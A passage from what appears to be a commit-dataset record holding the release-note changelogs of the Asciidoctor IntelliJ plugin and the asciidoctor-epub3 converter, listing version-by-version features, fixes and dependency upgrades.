(#244)\n\n=== 0.25.7 (preview, available from Github releases)\n\n- Updating to AsciidoctorJ v2.0.0 that includes Asciidoctor 2.0.8\n- adding highlighting for italic\/bold\/mono (#244)\n- adding brace matcher for attributes\n\n=== 0.25.6 (preview, available from Github releases)\n\n- Updating to AsciidoctorJ v2.0.0-RC.2 that includes Asciidoctor 2.0.6\n- Improved parsing of warnings and errors created by Asciidoctor\n\n=== 0.25.5 (preview, available from Github releases)\n\n- Addding error highlight in tree view\n\n=== 0.25.4 (preview, available from Github releases)\n\n- restart annotation processing for current file once it gets focused or settings change (#225)\n\n=== 0.25.3 (preview, available from Github releases)\n\n- improve offset calculation for .asciidoctorconfig files (#225)\n\n=== 0.25.2 (preview, available from Github releases)\n\n- annotate the file in the editor instead of logging to console for asciidoctor messages (#225)\n\n=== 0.25.1 (preview, available from Github releases)\n\n- Fixing preview line calculation when using .asciidoctorconfig-files\n- Updating to AsciidoctorJ v2.0.0-RC.1 that includes Asciidoctor 2.0.2\n\n=== 0.25.0 (preview, available from Github releases)\n\n- Updating to AsciidoctorJ v1.7.0-RC.1 that includes Asciidoctor 2.0.1 and Asciidoctor Diagram 1.5.16\n\n=== 0.24.4\n\n- Fixing preview line calculation when using .asciidoctorconfig-files\n\n=== 0.24.3\n\n- Filter out problematic pass-through JavaScript with Twitter being the first candidate (#235)\n\n=== 0.24.2 (preview, available from Github releases)\n\n- Support JDK11 as of IntelliJ 2019.1 EAP (#238)\n\n=== 0.24.1\n\n- Upgrade to AsciidoctorJ 1.6.2 and JRuby 9.2.6.0 (it's still backed by Asciidoctor 1.5.8)\n- Upgrade to asciidoctor diagram 1.5.12\n- Additional logging to analyze errors (#236)\n\n=== 0.24.0\n\n- Upgrade to AsciidoctorJ 1.6.1 and JRuby 9.2.5.0 (it's still backed by Asciidoctor 1.5.8)\n- Upgrade to asciidoctor diagram 1.5.11\n- Updated parser for old style multiline headings to be more specific (#233)\n- Added description for old style heading inspection (#233)\n\n=== 0.23.2\n\n- Resource cleanup for Asciidoctor Ruby Extensions (#220)\n\n=== 0.23.1 (preview, available from Github releases)\n\n- Updated file icon with less intrusive icon, also introducing SVG for icons (#230)\n- Editor notification to switch to JetBrains 64bit JDK (#189)\n- Tuning support for Asciidoctor Ruby Extensions (#220)\n\n=== 0.23.0 (preview, available from Github releases)\n\n- EXPERIMENTAL: Support Asciidoctor Ruby Extensions when placed in _.asciidoctor\/lib_ (#220)\n\n=== 0.22.0\n\n- Update to AsciidoctorJ 1.5.8.1\n- Workaround for incompatible plugins (#226)\n- Toggle softwraps only available in context menu of AsciiDoc documents (#227)\n- Recognize list continuations plus block instead of marking them as old style headings (#228)\n- EXPERIMENTAL: supporting _.asciidoctorconfig_ configuration files\n\n=== 0.21.4\n\n- Add official asciidoctor logo (#219)\n- Add soft wrap to tool bar (#221)\n- Editor Toolbar show status of toggles\n- Update to Asciidoctor Diagram 1.5.10 (#215)\n\n=== 0.21.3\n\n- upgrade to MathJAX 2.4.7 (as bundled in AsciidoctorJ 1.5.7)\n\n=== 0.21.2\n\n- Regression: show title of document again (#217)\n\n=== 0.21.1\n\n- allow attributes to be pre-defined in plugin settings (#216)\n\n=== 0.21.0 (preview, available from Github releases)\n\n- Update to AsciidoctorJ 1.5.7 and Asciidoctor Diagram 1.5.9\n- Treat \"line must be non negative\" only as a warning (#212)\n\n=== 0.20.6\n\n- Display 
all PlantUML graphics as PNG for preview (#170)\n\n=== 0.20.5\n\n- Adding hiDPI support for JavaFX preview (#125)\n\n=== 0.20.4\n\n- Requiring 2017.1 as minimum for this plugin (#207)\n\n=== 0.20.3 (preview, available from Github releases)\n\n- Avoiding deadlock on JavaFX initialization (#207)\n- Requiring 2017.2 as minimum for this plugin\n\n=== 0.20.2\n\n- Dejavu fonts now display chinese characters within tables (#203)\n\n=== 0.20.1\n\n- Upgrading to asciidoctorj-diagram 1.5.8\n- Dejavu fonts now display chinese characters (#203)\n\n=== 0.20.0\n\n- Add MathJax support in JavaFX preview #201\n- JavaFX preview is now the default for new installations of the plugin\n- Include DejaVu fonts for improved and consistent preview #184\n\n=== 0.19.2\n\n- Fix NullPointerExceptions when used with IntelliJ Language Injection and Fragment Editor #194\n\n=== 0.19.1\n\n- Support inspections to convert markdown and old style AsciiDoc headings to modern AsciiDoc headings #185\n- JRuby runtime updated to 9.1.8.0 to work with recent JDK versions (still, internal JetBrains JRE is the only supported version) #187\n\n=== 0.19.0\n\n- Support Icon fonts (thanks to @matthiasbalke) \/ #182\n- Update to asciidoctorj-1.5.6 (aka asciidoctor-1.5.6.1) and asciidoctorj-diagram-1.5.4.1\n- Support \"search everywhere\" (double Shift) and \"goto by name - Symbol...\" (Ctrl+Shift+Alt+N) for all AsciiDoc section headings - just enter a part of the heading\n- Support Markdown style sections (starting with '#') in syntax highlighting\n\n=== 0.18.2 (preview, available from Github releases)\n\n- Headings in Darcula theme preview are now light grey for better readability\n\n=== 0.18.1\n\n- Improved handling for non-printable characters in syntax highlighting\n\n=== 0.18.0 (preview, available from Github releases)\n\n- Update to asciidoctor 1.5.5\/asciidoctor-diagram 1.5.4\n- Capture Asciidoctor messages on stdout\/stderr and write them to IDE notifications\n- Close files when images are shown in preview\n- Set focus in editor when re-opening file\n- Fix \"line must be non negative\" error when clicking on preview\n\n=== 0.17.3\n\n- Make click-on-link-to-open and click-on-preview-to-set-cursor in JavaFX preview compatible with Java 8 u111+\n- Formatting actions from the toolbar should not throw exceptions when triggered at the beginning or end of the document\n\n=== 0.17.2\n\n- Plugin is now build using the https:\/\/gradle.org\/[Gradle] and https:\/\/github.com\/JetBrains\/gradle-intellij-plugin[gradle-intellij-plugin]\nThis should make contributing and releasing easier. Thanks Jiawen Geng!\n- Asciidoctor's temporary files are now created in a temporary folder per opened document. Thanks @agorges!\n\n=== 0.17.1 (preview, available from Github releases)\n\n- Improved handling of trailing spaces in syntax highlighting.\n- Fixed code\/preview sync for nested HTML (i.e. NOTE)\n\n=== 0.17.0 (preview, available from Github releases)\n\n- Updated block parsing to support two styles of headings.\n- Block starts and ends are need to be aligned in length and shape when parsed.\n\n=== 0.16.4\n\n- Improved darcula support for JavaFX. 
More block types are using proper dark background and light text colors.\n\n=== 0.16.3\n\n- Theme in preview can be switched from light to darcula independent of IDE theme\n\n=== 0.16.2\n\n- Handling of Linux and MacOS file names for image preview in JavaFX\n\n=== 0.16.1\n\n- Added darcula theme for JavaFX preview\n- Clicking on JavaFX preview will set cursor position in editor (thanks to @kastork for the idea)\n\n=== 0.15.4\n\n- setScene now called from FxThread instead of AWT thread to avoid blocking GUI on MacOS\n\n=== 0.15.3\n\n- Initialization message appears only during initialization\n- No error message if user switches to a setup where JavaFX preview is no longer available.\n\n=== 0.15.2 (preview, available from Github releases)\n\n- fixed detection of Mac 64 JVM to be able to activate JavaFX preview\n- click-on-url for JavaFX improved, when slow-loading external images are referenced\n\n=== 0.15.1 (preview, available from Github releases)\n\n- revised constrained\/unconstrained detection\n- Fix problem in syntax highlighting leading to PSI Parser Exceptions\n- refreshing images on JavaFX only if their content has changed to save memory consumption\n- Limiting JavaFX preview to 64bit platforms due to problems especially with Windows OpenJDK 32bit (as default on Windows).\n\n=== 0.15.0 (preview, available from Github releases)\n\n- correct usage of constrained\/unconstrained AsciiDoc formatting\n- JavaFX Preview will automatically scroll to the cursor position of the editor\n- JavaFX preview will automatically open links in the systems's default browser\n- Caching rendering instances of Asciidoctor for better performance\n\nIntelliJ 15 (including AppCode 3.3, CLion 1.2, DataGrip 1.0, PhpStorm 10, PyCharm 5, RubyMine 8, WebStorm 11) is the new minimum version required for this release.\n\n","old_contents":"= Asciidoctor IntelliJ Plugin Changelog\n\n== About\n\nThis document provides a high-level view of the changes introduced by release.\n\n[[releasenotes]]\n== Release notes\n\n=== 0.28.26 (work in progress)\n\n- improve handling of emails and links in editor (#307)\n\n=== 0.28.25\n\n- security review for in-browser preview, adding mac to prevent browser to retrieve arbitrary file, hiding referrer from externally retrieved resources (#303)\n\n=== 0.28.24 (preview, available from Github releases)\n\n- support undo for paste-image and send out notifications to add files to VCS (#298)\n- fix rendering of images in flicker-free fast preview (#241)\n- prevent NPE when opening AsciiDoc documents or fragments in browser (#303)\n- inspection to convert Markdown-style horizontal rules to AsciiDoc-style horizontal rules (thanks to @bbrenne) (#272, #302)\n\n=== 0.28.23 (preview, available from Github releases)\n\n- Paste image from clipboard (thanks to @bbrenne) (#298, #300)\n\n=== 0.28.22\n\n- Wrong test name in gutter when running tests, BrowserUrlProvider eagerly works on all files (#301)\n\n=== 0.28.21\n\n- fixing autocomplete for link: when brackets already provided\n- avoid flickering Math preview by replacing contents in Preview via JavaScript (#241)\n\n=== 0.28.20\n\n- Linking to Wiki page if JavaFX initialization is stuck (#299)\n\n=== 0.28.19\n\n- prevent \"`Initializing...`\" message in preview of empty file\n\n=== 0.28.18 (preview, available from Github releases)\n\n- detecting a stuck JavaFX initialization (#299)\n\n=== 0.28.17 (preview, available from Github releases)\n\n- tuning state resetting for lexer (#289)\n\n=== 0.28.16 (preview, available from Github releases)\n\n- adding 
code style settings for reformat (#289)\n- rework inline macro for false positives (#275)\n- ifdef\/ifndef\/endif body references attributes in (#275)\n- reset formatting after a blank line (#289)\n- navigate to auto-generated IDs of sections\n\n=== 0.28.15 (preview, available from Github releases)\n\n- respect imagesdir when resolving image paths in source file (#275)\n- resolve attribute names in macro definition (#275)\n- auto-completion of files should include \"..\" (#253)\n\n=== 0.28.14 (preview, available from Github releases)\n\n- lexer and highlighting support blocks with unbalanced or no delimiters (#289)\n\n=== 0.28.13 (preview, available from Github releases)\n\n- lexer and highlighting support several new tokens (callouts, admonitions, markdown style listings, definition lists) (#289)\n- reformat supports break-after-end-of-sentence, but still experimental (#289)\n\n=== 0.28.12 (preview, available from Github releases)\n\n- rework zoom for touchpads (#295)\n- added setting to disable error\/warning highlighting in editor (#296)\n\n=== 0.28.11 (preview, available from Github releases)\n\n- inject absolute location of .asciidoctorconfig file (thanks to @rdmueller) (#280)\n- support for '.adoc' extension of .asciidoctorconfig file (thanks to @rdmueller) (#293, #294)\n- new table size selector using the mouse (thanks to @bbrenne) (#92, #290)\n- create tables from clipboard and converting CSV\/TSV format to AsciiDoc (thanks to @bbrenne) (#92, #290)\n- better zoom support for touchpads, adding min\/max zoom level (#295)\n\n=== 0.28.10 (preview, available from Github releases)\n\n- inlining and extracting of includes (#271)\n\n=== 0.28.9 (preview, available from Github releases)\n\n- experimental support reformatting of AsciiDoc sources, needs to be enabled in the settings (#289)\n- \"`Open in Browser`\" now opens the contents of the preview in the selected browser including rendered diagrams (#82)\n\n=== 0.28.8 (preview, available from Github releases)\n\n- investigating problem that parts of the UI are not refreshing (#288)\n\n=== 0.28.7\n\n- Save image context menu now showing up on macOS (thanks to @wimdeblauwe) (#283)\n\n=== 0.28.6\n\n- fixing NPE introduced when detecting potentially blurry preview (#284)\n\n=== 0.28.5 (preview, available from Github releases)\n\n- support zoom in preview window (thanks to @ianflett) (#199, #279)\n- save generated images from preview (thanks to @bbrenne) (#245, #278)\n\n=== 0.28.4 (preview, available from Github releases)\n\n- autocompletion for attributes and attribute references (`:attr:` and `\\{attr}`) (thanks to @bbrenne) (#277)\n- renaming and find-usage for attribute names (#243)\n- upgrade to AsciidoctorJ 2.1.0 and Asciidoctor 2.0.10\n- statement completion adds newline if at end of file (#276)\n- listing and other delimiters recognized at end of file (#276)\n\n=== 0.28.3\n\n- brace matching for attribute start\/end (`:attr:` and `\\{attr}`)\n- syntax highlighting for enumerations (`.`)\n- fixing \"`Edit Fragment...`\" for listings (#276)\n\n=== 0.28.2\n\n- fixed parsing for old-style headers (#274)\n\n=== 0.28.1 (preview, available from Github releases)\n\n- new automated release mechanism, also EAP plugin repository\n\n=== 0.26.20 (preview, available from Github releases)\n\n- link to Wiki how to fix blurry preview (#213)\n- monospace-bold preview now working (#193)\n\n=== 0.26.19 (preview, available from Github releases)\n\n- tuning parsing and documentation (#267)\n- new inspection to shorten page break (`<<<`) where possible\n- 
`\\link:file#id[]` now with navigation and autocomplete (thanks to @bbrenne) (#273)\n\n=== 0.26.18 (preview, available from Github releases)\n\n- resolve the last reference in structure view as this will be the file; the others are the subdirectories (#267)\n- refactoring of shortened descriptions; now in sync for structure view and breadcrumbs (#267)\n- allow browser to cache static content to avoid flickering (#267)\n- allow more block types, supporting nested blocks, parsing content within blocks (#267)\n- rework folding to show first significant line in block (#267)\n\n=== 0.26.17 (preview, available from Github releases)\n\n- support escaping with backslash (`\\`) in editor, avoiding highlighting\n- move to released markdown-to-asciidoc version 1.1 to use proper dependency management (#268)\n- support spell checking on more elements including quotes, examples and comments (#269)\n- fixing autocomplete for file names on `include::[]` within blocks\n\n=== 0.26.16 (preview, available from Github releases)\n\n- show includes and images in structure view, adding icon set for breadcrumbs and structure view, tuning contents (#267)\n\n=== 0.26.15\n\n- fixing equals check for disabled injected languages (#266)\n\n=== 0.26.14\n\n- fixing NullPointerException in settings processing (#266)\n- supporting pass-through inline content\n\n=== 0.26.13\n\n- update to asciidoctorj-diagram:1.5.18\n- breadcrumb support in editor\n\n=== 0.26.12 (preview, available from Github releases)\n\n- supporting blanks in block attributes (#255)\n\n=== 0.26.11 (preview, available from Github releases)\n\n- adding support for GRAPHVIZ_DOT environment variable (#261)\n- adding support for statement completion (ctrl-shift-enter) (#263)\n- language injection is now enabled by default and can be disabled for specific languages, and will be disabled when the block has an `include::[]` (#255)\n- includes are now parsed and highlighted inside code blocks (#255)\n\n=== 0.26.10 (preview, available from Github releases)\n\n- Experimental highlighting in code blocks (#255, #262)\n\n=== 0.26.9 (preview, available from Github releases)\n\n- upgrading gradle and JetBrains plugin; now use `gradlew runIde` to start the plugin in development mode\n- allow user to switch left\/right and upper\/lower in split view (#136)\n- add syntax highlighter to support `\\link:file[]` (thanks to @bbrenne) (#259)\n- add syntax highlighter to support attribute:value and {attribute reference} (thanks to @bbrenne) (#260)\n\n=== 0.26.8 (preview, available from Github releases)\n\n- default file encoding for JRuby now UTF-8 if set file encoding is not supported by JRuby (#174)\n\n=== 0.26.7\n\n- fixing error in tree structure; improving test capabilities for parsing (#174)\n\n=== 0.26.6 (preview, available from Github releases)\n\n- improved brace matcher\n- ensure that block IDs are part of next section when folding (#174)\n\n=== 0.26.5 (preview, available from Github releases)\n\n- decouple read action from event thread to avoid error from IDE (#204)\n- highlighting for lexical quotes\n- parsing referenced file from reference (#204)\n\n=== 0.26.4 (preview, available from Github releases)\n\n- Support for relative path links in preview (#256)\n\n=== 0.26.3 (preview, available from Github releases)\n\n- allow folding of sections and blocks (#174)\n\n=== 0.26.2 (preview, available from Github releases)\n\n- allow horizontal split view via settings (#136)\n\n=== 0.26.1 (preview, available from Github releases)\n\n- adding color settings for syntax 
highlighting (#254)\n\n=== 0.26.0 (preview, available from Github releases)\n\n- support for anchors, block ids and references including linking and refactoring (#252)\n\n=== 0.25.14\n\n- making linking of documents work for standard includes (#204)\n- improved formatting when blank lines are edited, also handling spaces at the end of a line (#248)\n\n=== 0.25.13\n\n- support partial parsing in lexer to avoid flipping formatting in IntelliJ (#248)\n\n=== 0.25.12 (preview, available from Github releases)\n\n- adding additional rules for constrained formatting (#248)\n\n=== 0.25.11\n\n- moving from jruby-complete to jruby dependency like AsciidoctorJ did for 2.0 (#250)\n\n=== 0.25.10 (preview, available from Github releases)\n\n- improved syntax highlighting for block IDs and references, suppressing message \"possible invalid reference\" (#249)\n- show error message why preview wasn't rendered in preview (#251)\n\n=== 0.25.9\n\n- adding quote handler (#242)\n- Tuning highlighting for mono and bullet lists (#244)\n- Activating brace highlighting for mono\/italic\/bold (#244)\n\n=== 0.25.8 (preview, available from Github releases)\n\n- Tuning highlighting italic\/bold\/mono, adding brace matcher in text (#244)\n\n=== 0.25.7 (preview, available from Github releases)\n\n- Updating to AsciidoctorJ v2.0.0 that includes Asciidoctor 2.0.8\n- adding highlighting for italic\/bold\/mono (#244)\n- adding brace matcher for attributes\n\n=== 0.25.6 (preview, available from Github releases)\n\n- Updating to AsciidoctorJ v2.0.0-RC.2 that includes Asciidoctor 2.0.6\n- Improved parsing of warnings and errors created by Asciidoctor\n\n=== 0.25.5 (preview, available from Github releases)\n\n- Adding error highlight in tree view\n\n=== 0.25.4 (preview, available from Github releases)\n\n- restart annotation processing for current file once it gets focused or settings change (#225)\n\n=== 0.25.3 (preview, available from Github releases)\n\n- improve offset calculation for .asciidoctorconfig files (#225)\n\n=== 0.25.2 (preview, available from Github releases)\n\n- annotate the file in the editor instead of logging to console for asciidoctor messages (#225)\n\n=== 0.25.1 (preview, available from Github releases)\n\n- Fixing preview line calculation when using .asciidoctorconfig-files\n- Updating to AsciidoctorJ v2.0.0-RC.1 that includes Asciidoctor 2.0.2\n\n=== 0.25.0 (preview, available from Github releases)\n\n- Updating to AsciidoctorJ v1.7.0-RC.1 that includes Asciidoctor 2.0.1 and Asciidoctor Diagram 1.5.16\n\n=== 0.24.4\n\n- Fixing preview line calculation when using .asciidoctorconfig-files\n\n=== 0.24.3\n\n- Filter out problematic pass-through JavaScript with Twitter being the first candidate (#235)\n\n=== 0.24.2 (preview, available from Github releases)\n\n- Support JDK11 as of IntelliJ 2019.1 EAP (#238)\n\n=== 0.24.1\n\n- Upgrade to AsciidoctorJ 1.6.2 and JRuby 9.2.6.0 (it's still backed by Asciidoctor 1.5.8)\n- Upgrade to asciidoctor diagram 1.5.12\n- Additional logging to analyze errors (#236)\n\n=== 0.24.0\n\n- Upgrade to AsciidoctorJ 1.6.1 and JRuby 9.2.5.0 (it's still backed by Asciidoctor 1.5.8)\n- Upgrade to asciidoctor diagram 1.5.11\n- Updated parser for old style multiline headings to be more specific (#233)\n- Added description for old style heading inspection (#233)\n\n=== 0.23.2\n\n- Resource cleanup for Asciidoctor Ruby Extensions (#220)\n\n=== 0.23.1 (preview, available from Github releases)\n\n- Updated file icon with less intrusive icon, also introducing SVG for icons (#230)\n- Editor 
notification to switch to JetBrains 64bit JDK (#189)\n- Tuning support for Asciidoctor Ruby Extensions (#220)\n\n=== 0.23.0 (preview, available from Github releases)\n\n- EXPERIMENTAL: Support Asciidoctor Ruby Extensions when placed in _.asciidoctor\/lib_ (#220)\n\n=== 0.22.0\n\n- Update to AsciidoctorJ 1.5.8.1\n- Workaround for incompatible plugins (#226)\n- Toggle softwraps only available in context menu of AsciiDoc documents (#227)\n- Recognize list continuations plus block instead of marking them as old style headings (#228)\n- EXPERIMENTAL: supporting _.asciidoctorconfig_ configuration files\n\n=== 0.21.4\n\n- Add official asciidoctor logo (#219)\n- Add soft wrap to tool bar (#221)\n- Editor Toolbar show status of toggles\n- Update to Asciidoctor Diagram 1.5.10 (#215)\n\n=== 0.21.3\n\n- upgrade to MathJAX 2.4.7 (as bundled in AsciidoctorJ 1.5.7)\n\n=== 0.21.2\n\n- Regression: show title of document again (#217)\n\n=== 0.21.1\n\n- allow attributes to be pre-defined in plugin settings (#216)\n\n=== 0.21.0 (preview, available from Github releases)\n\n- Update to AsciidoctorJ 1.5.7 and Asciidoctor Diagram 1.5.9\n- Treat \"line must be non negative\" only as a warning (#212)\n\n=== 0.20.6\n\n- Display all PlantUML graphics as PNG for preview (#170)\n\n=== 0.20.5\n\n- Adding hiDPI support for JavaFX preview (#125)\n\n=== 0.20.4\n\n- Requiring 2017.1 as minimum for this plugin (#207)\n\n=== 0.20.3 (preview, available from Github releases)\n\n- Avoiding deadlock on JavaFX initialization (#207)\n- Requiring 2017.2 as minimum for this plugin\n\n=== 0.20.2\n\n- Dejavu fonts now display chinese characters within tables (#203)\n\n=== 0.20.1\n\n- Upgrading to asciidoctorj-diagram 1.5.8\n- Dejavu fonts now display chinese characters (#203)\n\n=== 0.20.0\n\n- Add MathJax support in JavaFX preview #201\n- JavaFX preview is now the default for new installations of the plugin\n- Include DejaVu fonts for improved and consistent preview #184\n\n=== 0.19.2\n\n- Fix NullPointerExceptions when used with IntelliJ Language Injection and Fragment Editor #194\n\n=== 0.19.1\n\n- Support inspections to convert markdown and old style AsciiDoc headings to modern AsciiDoc headings #185\n- JRuby runtime updated to 9.1.8.0 to work with recent JDK versions (still, internal JetBrains JRE is the only supported version) #187\n\n=== 0.19.0\n\n- Support Icon fonts (thanks to @matthiasbalke) \/ #182\n- Update to asciidoctorj-1.5.6 (aka asciidoctor-1.5.6.1) and asciidoctorj-diagram-1.5.4.1\n- Support \"search everywhere\" (double Shift) and \"goto by name - Symbol...\" (Ctrl+Shift+Alt+N) for all AsciiDoc section headings - just enter a part of the heading\n- Support Markdown style sections (starting with '#') in syntax highlighting\n\n=== 0.18.2 (preview, available from Github releases)\n\n- Headings in Darcula theme preview are now light grey for better readability\n\n=== 0.18.1\n\n- Improved handling for non-printable characters in syntax highlighting\n\n=== 0.18.0 (preview, available from Github releases)\n\n- Update to asciidoctor 1.5.5\/asciidoctor-diagram 1.5.4\n- Capture Asciidoctor messages on stdout\/stderr and write them to IDE notifications\n- Close files when images are shown in preview\n- Set focus in editor when re-opening file\n- Fix \"line must be non negative\" error when clicking on preview\n\n=== 0.17.3\n\n- Make click-on-link-to-open and click-on-preview-to-set-cursor in JavaFX preview compatible with Java 8 u111+\n- Formatting actions from the toolbar should not throw exceptions when triggered at the 
beginning or end of the document\n\n=== 0.17.2\n\n- Plugin is now built using the https:\/\/gradle.org\/[Gradle] and https:\/\/github.com\/JetBrains\/gradle-intellij-plugin[gradle-intellij-plugin]\nThis should make contributing and releasing easier. Thanks Jiawen Geng!\n- Asciidoctor's temporary files are now created in a temporary folder per opened document. Thanks @agorges!\n\n=== 0.17.1 (preview, available from Github releases)\n\n- Improved handling of trailing spaces in syntax highlighting.\n- Fixed code\/preview sync for nested HTML (i.e. NOTE)\n\n=== 0.17.0 (preview, available from Github releases)\n\n- Updated block parsing to support two styles of headings.\n- Block starts and ends need to be aligned in length and shape when parsed.\n\n=== 0.16.4\n\n- Improved darcula support for JavaFX. More block types are using proper dark background and light text colors.\n\n=== 0.16.3\n\n- Theme in preview can be switched from light to darcula independent of IDE theme\n\n=== 0.16.2\n\n- Handling of Linux and MacOS file names for image preview in JavaFX\n\n=== 0.16.1\n\n- Added darcula theme for JavaFX preview\n- Clicking on JavaFX preview will set cursor position in editor (thanks to @kastork for the idea)\n\n=== 0.15.4\n\n- setScene now called from FxThread instead of AWT thread to avoid blocking GUI on MacOS\n\n=== 0.15.3\n\n- Initialization message appears only during initialization\n- No error message if user switches to a setup where JavaFX preview is no longer available.\n\n=== 0.15.2 (preview, available from Github releases)\n\n- fixed detection of Mac 64 JVM to be able to activate JavaFX preview\n- click-on-url for JavaFX improved, when slow-loading external images are referenced\n\n=== 0.15.1 (preview, available from Github releases)\n\n- revised constrained\/unconstrained detection\n- Fix problem in syntax highlighting leading to PSI Parser Exceptions\n- refreshing images on JavaFX only if their content has changed to save memory consumption\n- Limiting JavaFX preview to 64bit platforms due to problems especially with Windows OpenJDK 32bit (as default on Windows).\n\n=== 0.15.0 (preview, available from Github releases)\n\n- correct usage of constrained\/unconstrained AsciiDoc formatting\n- JavaFX Preview will automatically scroll to the cursor position of the editor\n- JavaFX preview will automatically open links in the system's default browser\n- Caching rendering instances of Asciidoctor for better performance\n\nIntelliJ 15 (including AppCode 3.3, CLion 1.2, DataGrip 1.0, PhpStorm 10, PyCharm 5, RubyMine 8, WebStorm 11) is the new minimum version required for this release.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c7f571efb8389903dede7153837be18bd186d668","subject":"remove wrong changelog for #190, it wasn't fixed","message":"remove wrong changelog for #190, it wasn't fixed\n","repos":"asciidoctor\/asciidoctor-epub3","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"= {project-name} Changelog\n:project-name: Asciidoctor EPUB3\n:uri-repo: https:\/\/github.com\/asciidoctor\/asciidoctor-epub3\n\nThis document provides a high-level view of the changes to the {project-name} by release.\nFor a detailed view of what has changed, refer to the {uri-repo}\/commits\/master[commit history] on GitHub.\n\n== Unreleased\n\n* use imagedir from an image's context during packaging (#282)\n* fix images in tables not included in epub archive (#169)\n* fix inline images not being included in epub archive (#30)\n\n== 1.5.0.alpha.13 
(2020-02-04) - @slonopotamus\n\n* remove kindlegen and epubcheck-ruby from runtime dependencies (#288)\n\n== 1.5.0.alpha.12 (2020-02-02) - @slonopotamus\n\n* make kindlegen a runtime dependency so it installs automatically during `gem install asciidoctor-epub3` (#270)\n* make `KINDLEGEN` env var work again (#269)\n* stop adding default front cover image (#180)\n* enable Pygments on non-Windows JRuby platforms (#264)\n* provide a human-readable error message when we fail to find KindleGen (#268)\n* try to use KindleGen\/EPUBCheck binary from `$PATH` (#276)\n* add `ebook-kindlegen-path`\/`ebook-epubcheck-path` attributes to override KindleGen\/EPUBCheck executable location (#276)\n\n== 1.5.0.alpha.11 (2020-01-26) - @slonopotamus\n\n* drop unused dependencies: thread_safe, concurrent-ruby (#234)\n* add support for Unicode characters in chapter IDs (#217)\n* fix sample-book to be a valid book (#196)\n* don't insert quotation marks around quotes (#129)\n* require at least Asciidoctor 1.5.3 (#245)\n* remove Namo Reader font-icon quirk that produced invalid markup (#192)\n* fix the (in)famous `undefined method `to_ios'` when given a document that doesn't follow asciidoctor-epub3 rules (#7)\n* route messages through the logger (#176)\n* update EPUBCheck to 4.2.2.0 (#240)\n* handle invalid `revdate` gracefully (#14)\n* do not post-process EPUBCHECK env var, but use it as-is (#258)\n* disable Pygments on JRuby to prevent hanging (#253)\n* fix ENOENT error when trying to run EPUBCheck on JRuby on Windows (#256)\n* fix ENOENT error when running kindlegen on JRuby on Windows (#154)\n* set up CI for JRuby on Windows (#254)\n\n== 1.5.0.alpha.10 (2020-01-20) - @slonopotamus\n\n* fix deep xrefs between chapters when using Asciidoctor 2 (#210)\n* switch from epubcheck to epubcheck-ruby (#224)\n* set up a test suite (#11)\n* set up rubocop to enforce a consistent code style (#223)\n* use GitHub Actions for CI and release process (#218)\n* fix JS causing malformed XML that prevented footnotes from being displayed in Calibre (#207)\n* fix installing on Windows (#213, #216)\n* upgrade pygments.rb to 1.2.1 (#216)\n* gepub dependency is no longer locked to 1.0.2 and will use latest 1.0.x version\n* fix `-a ebook-validate` not working on Windows (#232)\n\n== 1.5.0.alpha.9 (2019-04-04) - @mojavelinux\n\n* allow converter to be used with Asciidoctor 2 (#185)\n* upgrade gepub (and, indirectly, nokogiri) (#177)\n* add support for start attribute on ordered list\n* don't add end mark to chapter when publication-type is book (#163)\n* drop unsupported versions of Ruby from CI matrix\n\n== 1.5.0.alpha.8 (2018-02-20) - @mojavelinux\n\n* include inline images in EPUB3 archive (#5)\n* allow chapter to begin with level-1 section title by adding support for negative leveloffset (#107)\n* don't transform the chapter title to uppercase (rely on CSS only) (#97)\n* set correct mimetype for TTF files (#120)\n* implement support for the custom xrefstyle for references within a chapter (#132)\n* show correct path of front cover image and the current document when missing (#124)\n* retain ID of block image (#141)\n* retain ID of example block (#143)\n* retain ID of admonition block (#146)\n* transfer role specified on block image to output (#145)\n* handle nil response from pygments.rb (#156)\n* invert the colors for the chapter title (use black on white) (#96)\n* darken font on Kindle Paperwhite devices (#67)\n\n== 1.5.0.alpha.7 (2017-04-18) - @mojavelinux\n\n* generate TOC levels in navigation document based on toclevels attribute 
(#90)\n* automatically resolve title of reference between documents (#87)\n* fix xref between chapter files (#27)\n* don't include byline in chapter header if the value of the publication-type attribute is book (#86)\n* don't include avatars if value of publication-type attribute is book (#53)\n* make a stronger statement in the README about the dangers of the \u201cSend to Kindle\u201d tool\n* add ebook-compress flag to enable huffdic compression in kindlegen\n* implement embedded to handle AsciiDoc table cell content (#69)\n* go into more depth about how to structure the document in README (#45)\n* explain how to adjust section level of chapters if they use level-2 headings\n* don't add content image to archive more than once (#76)\n* warn when xref cannot be resolved and text is provided (#103)\n* built-in avatar location should respect imagesdir (#2)\n* change admonition icons (#72) (@PrimaryFeather)\n* fix broken refs in bibliography (#19)\n* remove text justification hack (#92)\n* reset @page for CSS3-capable readers\n* detect Calibre, set class attribute on body to calibre-desktop, add page margins\n* force preformatted text to wrap in Gitden\n* add svg property to front matter only if reference to SVG is detected\n* switch from word-wrap to standard overflow-wrap property in stylesheet\n* loosen letter spacing in quote attribute context\n* adjust font size and margins on Gitden; force margins to be set\n* document in README that using vw units causes Aldiko to crash\n* drop trailing semi-colon in value of inline style attributes\n* use standard format (from core) for warning and error messages\n* update terminology in README; use ebook instead of e-book; refer to application as ereader\n* allow front-cover-image to be specified using block image macro (#3)\n* clean auto-generated file names for chapters (#46)\n* register chapter ID in references\n* only wrap open block content in div if id or role is defined (@rvolz)\n* link to EPUB 3.1 spec from README\n* set ebook-format-kf8 attribute when ebook-format is specified as mobi\n* document the front-cover-image attribute properly\n* update adb-push-book script to honor file extension if specified\n* document limitations of applying page-break-* property on Kindle\n* document that Asciidoctor is added as creator if creator attribute is not specified (#68)\n* group optional gems in the :optional group; remove from gemspec\n* upgrade kindlegen gem to 3.0.3\n* upgrade Pygments to 1.1.1 and allow JRuby to install it\n* document that Pygments bw style is used by default\n* honor explicit table width even when autowidth option is set\n* use method_defined? instead of respond_to? 
